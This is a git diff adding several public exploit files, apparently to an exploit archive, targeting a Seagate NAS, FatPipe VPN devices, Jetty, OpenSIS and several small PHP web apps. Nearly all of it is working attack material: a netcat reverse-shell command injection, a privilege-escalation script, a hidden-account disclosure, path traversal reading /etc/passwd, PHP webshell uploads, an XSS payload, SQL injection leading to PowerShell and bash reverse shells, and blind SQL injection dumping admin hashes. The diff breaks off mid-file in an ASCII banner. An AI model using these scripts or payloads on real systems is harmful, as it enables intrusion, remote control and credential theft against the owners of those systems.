diff --git a/exploits/hardware/webapps/50132.py b/exploits/hardware/webapps/50132.py
new file mode 100755
index 000000000..4b2aa9629
--- /dev/null
+++ b/exploits/hardware/webapps/50132.py
@@ -0,0 +1,29 @@
+# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection
+# Date: 15.07.2021
+# Discovered by: Jeroen - IT Nerdbox
+# Exploit Author: Metin Yunus Kandemir
+# Version: sg2000-2000.1331
+# Vendor Homepage: https://www.seagate.com/
+# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/
+
+#!/usr/bin/python3
+
+import requests
+import sys
+
+def exec(target, ncIp, ncPort):
+ print("[!] Please check netcat listener: "+ ncPort)
+ url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00"
+ r = requests.get(url = url)
+ sys.exit(1)
+
+def main(args):
+ if len(args) != 4:
+ print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0]))
+ print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80")
+ sys.exit(1)
+ exec(target=args[1], ncIp=args[2], ncPort=args[3])
+
+
+if __name__ == "__main__":
+ main(args=sys.argv)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt
new file mode 100644
index 000000000..912ef064d
--- /dev/null
+++ b/exploits/hardware/webapps/50341.txt
@@ -0,0 +1,118 @@
+# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
+
+
+Vendor: FatPipe Networks Inc.
+Product web page: https://www.fatpipeinc.com
+Affected version: WARP / IPVPN / MPVPN
+ 10.2.2r38
+ 10.2.2r25
+ 10.2.2r10
+ 10.1.2r60p82
+ 10.1.2r60p71
+ 10.1.2r60p65
+ 10.1.2r60p58s1
+ 10.1.2r60p58
+ 10.1.2r60p55
+ 10.1.2r60p45
+ 10.1.2r60p35
+ 10.1.2r60p32
+ 10.1.2r60p13
+ 10.1.2r60p10
+ 9.1.2r185
+ 9.1.2r180p2
+ 9.1.2r165
+ 9.1.2r164p5
+ 9.1.2r164p4
+ 9.1.2r164
+ 9.1.2r161p26
+ 9.1.2r161p20
+ 9.1.2r161p17
+ 9.1.2r161p16
+ 9.1.2r161p12
+ 9.1.2r161p3
+ 9.1.2r161p2
+ 9.1.2r156
+ 9.1.2r150
+ 9.1.2r144
+ 9.1.2r129
+ 7.1.2r39
+ 6.1.2r70p75-m
+ 6.1.2r70p45-m
+ 6.1.2r70p26
+ 5.2.0r34
+
+Summary: FatPipe Networks invented the concept of router-clustering,
+which provides the highest level of reliability, redundancy, and speed
+of Internet traffic for Business Continuity and communications. FatPipe
+WARP achieves fault tolerance for companies by creating an easy method
+of combining two or more Internet connections of any kind over multiple
+ISPs. FatPipe utilizes all paths when the lines are up and running,
+dynamically balancing traffic over the multiple lines, and intelligently
+failing over inbound and outbound IP traffic when ISP services and/or
+components fail.
+
+FatPipe IPVPN balances load and provides reliability among multiple
+managed and CPE based VPNs as well as dedicated private networks. FatPipe
+IPVPN can also provide you an easy low-cost migration path from private
+line, Frame or Point-to-Point networks. You can aggregate multiple private,
+MPLS and public networks without additional equipment at the provider's
+site.
+
+FatPipe MPVPN, a patented router clustering device, is an essential part
+of Disaster Recovery and Business Continuity Planning for Virtual Private
+Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+300% times more reliable, redundant and faster. MPVPN can take WANs with
+an uptime of 99.5% or less and make them 99.999988% or higher, providing
+a virtually infallible WAN. MPVPN dynamically balances load over multiple
+lines and ISPs without the need for BGP programming. MPVPN aggregates up
+to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+you need to keep your VPN up and running despite failures of service, line,
+software, or hardware.
+
+Desc: The application has a hidden administrative account 'cmuser' that has
+no password and has write access permissions to the device. The user cmuser
+is not visible in Users menu list of the application.
+
+Tested on: Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5684
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
+
+
+30.05.2016
+25.07.2021
+
+--
+
+
+Overview:
+FatPipe Central Manager is a secure web based solution providing a centralized solution
+to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
+allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
+click of a button.
+
+Central Manager = cmuser.
+Once authenticated, you get admin rights.
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Strict-Transport-Security: max-age=31536000
+X-Frame-Options: DENY
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Content-Type: application/json;charset=ISO-8859-1
+Content-Length: 118
+Date: Fri, 06 Aug 2017 16:37:07 GMT
+Connection: close
+
+{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py
new file mode 100755
index 000000000..c2109cdc1
--- /dev/null
+++ b/exploits/hardware/webapps/50342.py
@@ -0,0 +1,191 @@
+# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+#!/usr/bin/env python3
+#
+#
+# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
+#
+#
+# Vendor: FatPipe Networks Inc.
+# Product web page: https://www.fatpipeinc.com
+# Affected version: WARP / IPVPN / MPVPN
+# 10.2.2r38
+# 10.2.2r25
+# 10.2.2r10
+# 10.1.2r60p82
+# 10.1.2r60p71
+# 10.1.2r60p65
+# 10.1.2r60p58s1
+# 10.1.2r60p58
+# 10.1.2r60p55
+# 10.1.2r60p45
+# 10.1.2r60p35
+# 10.1.2r60p32
+# 10.1.2r60p13
+# 10.1.2r60p10
+# 9.1.2r185
+# 9.1.2r180p2
+# 9.1.2r165
+# 9.1.2r164p5
+# 9.1.2r164p4
+# 9.1.2r164
+# 9.1.2r161p26
+# 9.1.2r161p20
+# 9.1.2r161p17
+# 9.1.2r161p16
+# 9.1.2r161p12
+# 9.1.2r161p3
+# 9.1.2r161p2
+# 9.1.2r156
+# 9.1.2r150
+# 9.1.2r144
+# 9.1.2r129
+# 7.1.2r39
+# 6.1.2r70p75-m
+# 6.1.2r70p45-m
+# 6.1.2r70p26
+# 5.2.0r34
+#
+# Summary: FatPipe Networks invented the concept of router-clustering,
+# which provides the highest level of reliability, redundancy, and speed
+# of Internet traffic for Business Continuity and communications. FatPipe
+# WARP achieves fault tolerance for companies by creating an easy method
+# of combining two or more Internet connections of any kind over multiple
+# ISPs. FatPipe utilizes all paths when the lines are up and running,
+# dynamically balancing traffic over the multiple lines, and intelligently
+# failing over inbound and outbound IP traffic when ISP services and/or
+# components fail.
+#
+# FatPipe IPVPN balances load and provides reliability among multiple
+# managed and CPE based VPNs as well as dedicated private networks. FatPipe
+# IPVPN can also provide you an easy low-cost migration path from private
+# line, Frame or Point-to-Point networks. You can aggregate multiple private,
+# MPLS and public networks without additional equipment at the provider's
+# site.
+#
+# FatPipe MPVPN, a patented router clustering device, is an essential part
+# of Disaster Recovery and Business Continuity Planning for Virtual Private
+# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+# 300% times more reliable, redundant and faster. MPVPN can take WANs with
+# an uptime of 99.5% or less and make them 99.999988% or higher, providing
+# a virtually infallible WAN. MPVPN dynamically balances load over multiple
+# lines and ISPs without the need for BGP programming. MPVPN aggregates up
+# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+# you need to keep your VPN up and running despite failures of service, line,
+# software, or hardware.
+#
+# Desc: The application suffers from a privilege escalation vulnerability.
+# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
+# POST request and setting the JSON parameter 'privilege' to integer value
+# '1' gaining administrative rights (group ADMINISTRATOR, 1).
+#
+# Tested on: Apache-Coyote/1.1
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2021-5685
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
+#
+#
+# 30.05.2016
+# 25.07.2021
+#
+#
+
+import sys
+import time#######
+import requests################
+requests.packages.urllib3.disable_warnings()
+
+if len(sys.argv) !=2:
+ print
+ print("********************************************************")
+ print("* *")
+ print("* Privilege escalation from USER to ADMINISTRATOR role *")
+ print("* in *")
+ print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
+ print("* *")
+ print("* ZSL-2021-5685 *")
+ print("* *")
+ print("********************************************************")
+ print("\n[POR] Usage: ./escalator.py [IP]")
+ sys.exit()
+
+ajpi=sys.argv[1]
+print
+juzer=raw_input("[UNE] Username: ")
+pasvord=raw_input("[UNE] Password: ")
+
+sesija=requests.session()
+logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
+
+hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
+ 'Accept' :'application/json, text/javascript, */*; q=0.01',
+ 'X-Requested-With':'XMLHttpRequest',
+ 'Sec-Ch-Ua-Mobile':'?0',
+ 'User-Agent' :'Fatnet/1.b',
+ 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Origin' :'https://'+ajpi,
+ 'Sec-Fetch-Site' :'same-origin',
+ 'Sec-Fetch-Mode' :'cors',
+ 'Sec-Fetch-Dest' :'empty',
+ 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
+ 'Accept-Encoding' :'gzip, deflate',
+ 'Accept-Language' :'en-US,en;q=0.9',
+ 'Connection' :'close'}
+
+juarel1='https://'+ajpi+'/fpui/loginServlet'
+alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
+
+if not 'success' in alo.text:
+ print('[GRE] Login error.')
+ sys.exit()
+else:
+ print('[POR] Authentication successful.')
+
+print('[POR] Climbing the ladder...')
+
+sluba='''
+|| || .--._
+||====|| __ '---._)
+|| ||"")\ Q Q )
+||====|| =_/ o /
+|| || | \_.-;-'-,._
+||====|| | ' o---o )
+|| || \ /H __H\ /
+||====|| '-' \"")\/ |
+|| || _ |_='-)_/
+||====|| / '. )
+|| || / /
+||====|| |___/\| /
+|| || |_| | |
+||====|| / ) \\ \\
+|| || (__/ \___\\
+||====|| \_\\
+|| || / )
+||====|| (__/
+'''
+
+for k in sluba:
+ sys.stdout.write(k)
+ sys.stdout.flush()
+ time.sleep(0.01)
+
+juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
+posta={
+'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
+}
+stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
+
+if not 'true' in stanje.text:
+ print('\n[GRE] Something\'s fishy!')
+ sys.exit()
+else:
+ print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
+ sys.exit()
\ No newline at end of file
diff --git a/exploits/java/webapps/50438.txt b/exploits/java/webapps/50438.txt
new file mode 100644
index 000000000..6e1381860
--- /dev/null
+++ b/exploits/java/webapps/50438.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure
+# Date: 2021-10-21
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.eclipse.org/jetty/
+# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
+# Version: 9.4.37.v20210219 and 9.4.38.v20210224
+# Tested on: Kali Linux
+# CVE : CVE-2021-28164
+
+POC #1 - web.xml
+
+GET /%2e/WEB-INF/web.xml HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
\ No newline at end of file
diff --git a/exploits/php/webapps/50259.txt b/exploits/php/webapps/50259.txt
new file mode 100644
index 000000000..0ac46e09c
--- /dev/null
+++ b/exploits/php/webapps/50259.txt
@@ -0,0 +1,22 @@
+# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
+# Date: 09-02-2021
+# Exploit Author: Eric Salario
+# Vendor Homepage: http://www.os4ed.com/
+# Software Link: https://opensis.com/download
+# Version: 8.0
+# Tested on: Windows, Linux
+# CVE: CVE-2021-40651
+
+The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
+
+To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file.
+
+1. Login as "Parent"
+
+2. Open a web proxy such as BurpSuite and capture the requests
+
+3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
+
+4. Check the response
+
+PoC: https://youtu.be/wFwlbXANRCo
\ No newline at end of file
diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py
new file mode 100755
index 000000000..28eae8ba2
--- /dev/null
+++ b/exploits/php/webapps/50264.py
@@ -0,0 +1,78 @@
+# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
+# Date: 03/09/2021
+# Exploit Author: a-rey
+# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14928
+# Version: v1.0
+# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
+# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import time
+import logging
+import requests
+import argparse
+
+BANNER = """
+╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
+║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
+╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
+ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m
+ \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m
+ \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m
+ \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m
+ \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m
+ \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m
+"""
+
+
+def exploit(url:str, file:str, delay:int) -> None:
+ if not os.path.exists(file):
+ logging.error(f'webshell payload "{file}"" does not exist?')
+ return
+ logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
+ uploadTime = int(time.time())
+ r = requests.post(url + '/classes/SystemSettings.php',
+ files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
+ params={'f' : 'update_settings'},
+ verify=False
+ )
+ if not r.ok:
+ logging.error('HTTP upload request failed')
+ return
+ logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
+ for i in range(uploadTime - delay, uploadTime + delay + 1):
+ r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
+ logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
+ # NOTE: website will send redirects for all files that do not exist
+ if r.status_code != 302:
+ logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
+ return
+ logging.error('failed to find payload on target')
+ logging.warning('maybe need a larger delay or uploads directory is not writable?')
+ return
+
+
+if __name__ == '__main__':
+ # parse arguments
+ parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
+ parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
+ parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
+ parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
+ parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
+ args = parser.parse_args()
+ # define logger
+ logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
+ logging.SUCCESS = logging.CRITICAL + 1
+ logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
+ logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
+ logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
+ logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
+ logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
+ # print banner
+ print(BANNER)
+ # run exploit
+ exploit(args.url, args.payload, args.delay)
\ No newline at end of file
diff --git a/exploits/php/webapps/50326.txt b/exploits/php/webapps/50326.txt
new file mode 100644
index 000000000..bfb9ee9a3
--- /dev/null
+++ b/exploits/php/webapps/50326.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
+# Exploit Author: ()t/\/\1
+# Date: 23/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Tested on: Linux
+# Version: 2.0
+
+# Exploit Description:
+The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
+
+
+# PoC request
+
+POST /expense_budget/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/expense_budget/admin/?page=user
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
+Content-Length: 824
+Connection: close
+Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
+
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="firstname"
+
+A
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="lastname"
+
+a
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="img"; filename="na3na3.php"
+Content-Type: image/jpeg
+
+<?php echo "<pre>";system($_GET['cmd']); ?>
+-----------------------------1399170066243244238234165712--
\ No newline at end of file
diff --git a/exploits/php/webapps/50350.txt b/exploits/php/webapps/50350.txt
new file mode 100644
index 000000000..e27954ca5
--- /dev/null
+++ b/exploits/php/webapps/50350.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
+# Date: 2/3/2021
+# Author: 0xB9
+# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
+# Version: 1.3.0
+# Tested on: Windows 10
+# CVE: CVE-2021-24286
+
+1. Description:
+This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
+
+2. Proof of Concept:
+wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
\ No newline at end of file
diff --git a/exploits/php/webapps/50439.py b/exploits/php/webapps/50439.py
new file mode 100755
index 000000000..abc88f87f
--- /dev/null
+++ b/exploits/php/webapps/50439.py
@@ -0,0 +1,98 @@
+# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
+# Date:21/10/2021
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
+# Version: 1.0
+# Tested on: Windows 7 and Ubuntu 21.10
+# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
+
+# Vulnerability: Through SQL injection to bypass the login form it is
+possible to upload a malicious file and after use that malicious file to
+execute code in the remote system.
+# Proof of Concept:
+
+import requests
+import sys
+import time
+
+
+session = requests.Session()
+#http_proxy = "http://127.0.0.1:8080"
+#https_proxy = "https://127.0.0.1:8080"
+
+#proxyDict = {"http" : http_proxy,
+# "https" : https_proxy}
+
+def windows(HPW,host,shell_name):
+payload =
+"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
+host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
+#print(payload)
+try:
+request_rce = requests.get(host2,timeout=8)
+except requests.exceptions.ReadTimeout:
+pass
+
+
+def linux(HPL,host,shell_name):
+payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
+host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
+#print(payload)
+try:
+request_rce = requests.get(host2,timeout=8)
+except requests.exceptions.ReadTimeout:
+pass
+
+def main():
+
+host = sys.argv[1]
+shell_name = sys.argv[2]
+url = host + '/login.php'
+values = {'user': "admin",
+ 'email': "' OR 1 -- -",
+ 'password': '',
+ 'btn_login': ""
+ }
+
+r = session.post(url, data=values)
+cookie = session.cookies.get_dict()['PHPSESSID']
+
+data = { 'btn_web':''}
+headers= {'Cookie': 'PHPSESSID='+cookie}
+
+
+
+request = session.post(host+ '/manage_website.php', data=data,
+headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
+print("")
+print('[*] Your Simple Webshell was uploaded to ' + host +
+'/uploadImage/Logo/' + shell_name + '.php' )
+print("")
+LHOST = input('[+] Enter your LHOST: ')
+LPORT = input('[+] Enter your LPORT: ')
+print("")
+HPW= "'"+LHOST+"'"+','+LPORT
+HPL= ""+LHOST+""+'/'+LPORT
+
+print('[+] Option 1: Windows')
+print('[+] Option 2: Linux')
+
+option = input('[+] Choose OS: ')
+
+if option == "1":
+
+windows(HPW,host,shell_name)
+exit()
+
+elif option == "2":
+linux(HPL,host,shell_name)
+exit()
+
+else:
+print("Please choose Windows or Linux")
+
+main()
+
+#Usage: python3 host shell_name
+#Example: python3 http://localhost/clinic shell
\ No newline at end of file
diff --git a/exploits/php/webapps/50440.txt b/exploits/php/webapps/50440.txt
new file mode 100644
index 000000000..5cc214d29
--- /dev/null
+++ b/exploits/php/webapps/50440.txt
@@ -0,0 +1,116 @@
+# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
+# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
+# Date: 2021-10-21
+# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: 1.0
+# Tested On: Windows 10 + XAMPP + Python 3
+
+# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
+# with access to the username and md5 hash of any administrators.
+# Vulnerable file: /online-course-registration/Online/pincode-verification.php
+# Proof of Concept:
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import string
+
+def exploit(hostname, username, password):
+
+ # Building bruteforce list
+ pass_list = list(string.ascii_lowercase)
+ pass_list += list(range(0,10))
+ pass_list = map(str, pass_list)
+ pass_list = list(pass_list)
+
+ user_list = pass_list
+ user_list += list(string.ascii_uppercase)
+ user_list = map(str, user_list)
+ user_list = list(user_list)
+
+ session = requests.Session()
+
+ # This URL may change based on the implementation - change as needed
+ url = f"{hostname}/online-course-registration/Online/index.php"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
+ data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
+ r = session.post(url, headers=headers, data=data)
+
+
+ print("Admin username:")
+ # This range number is pretty arbitrary, so change it to whatever you feel like
+ for i in range(1,33):
+ counter = 0
+ find = False
+ for j in user_list:
+ # This URL may change based on the implementation - change as needed
+ url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
+ data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
+ a = session.post(url, headers=headers, data=data)
+ counter += 1
+ if 'Course Enroll' in a.text:
+ sys.stdout.write(j)
+ sys.stdout.flush()
+ break
+ elif counter == len(user_list):
+ find = True
+ break
+ if find:
+ break
+
+ print("\n")
+ print("Admin password hash:")
+ # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
+ for i in range(1,33):
+ counter = 0
+ find = False
+ for j in pass_list:
+ url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
+ data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
+ a = session.post(url, headers=headers, data=data)
+ counter += 1
+ if 'Course Enroll' in a.text:
+ sys.stdout.write(j)
+ sys.stdout.flush()
+ break
+ elif counter == len(pass_list):
+ find = True
+ break
+ if find:
+ break
+
+ print("\n\nSuccessfully pwnd :)")
+
+def logo():
+ art = R'''
+__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
+ _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
+ _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
+ _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
+ _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
+ _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
+ _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
